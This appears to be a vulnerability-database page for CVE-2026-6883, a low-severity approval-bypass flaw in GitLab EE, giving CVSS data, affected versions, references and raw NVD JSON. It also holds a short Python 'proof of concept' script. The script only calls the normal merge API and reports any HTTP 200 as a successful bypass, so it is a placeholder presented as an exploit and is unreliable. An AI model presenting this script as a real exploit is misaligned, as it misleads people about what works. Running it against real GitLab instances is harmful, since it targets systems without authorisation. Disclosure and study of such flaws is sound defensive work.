CVE-2026-6883

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 15.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to bypass merge request approval requirements due to improper cleanup of orphaned policy records.

CVSS Details

CVSS Score

2.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GitLab EE >= 15.7, < 18.9.7

GitLab EE >= 18.10, < 18.10.6

GitLab EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Conceptual Proof of Concept for CVE-2026-6883
# This script demonstrates the potential to bypass merge request approvals
# due to improper cleanup of orphaned policy records.

TARGET = "https://gitlab.example.com"
TOKEN = "your_access_token"
PROJECT_ID = "1"
MR_IID = "2"

headers = {"PRIVATE-TOKEN": TOKEN}

def exploit():
    # Step 1: Attacker authenticates and identifies a target Merge Request
    print(f"[*] Targeting MR {MR_IID} on Project {PROJECT_ID}...")

    # Step 2: Trigger the condition where orphaned policy records exist
    # (In a real scenario, this involves specific API interactions to create/del policies)
    print("[*] Simulating environment with orphaned policy records...")

    # Step 3: Attempt to accept the Merge Request without full approvals
    url = f"{TARGET}/api/v4/projects/{PROJECT_ID}/merge_requests/{MR_IID}/merge"
    payload = {
        "merge_when_pipeline_succeeds": True,
        "should_remove_source_branch": False
    }

    response = requests.put(url, headers=headers, json=payload)

    if response.status_code == 200:
        print("[+] Exploit successful! Merge Request accepted bypassing approval rules.")
    else:
        print(f"[-] Exploit failed. Status: {response.status_code}")
        print(response.text)

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6883
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6883
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6883/
[4] VulDB https://vuldb.com/cve/CVE-2026-6883
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/596350

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6883", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:25.117", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 15.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to bypass merge request approval requirements due to improper cleanup of orphaned policy records."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/596350", "source": "[email protected]"}]}}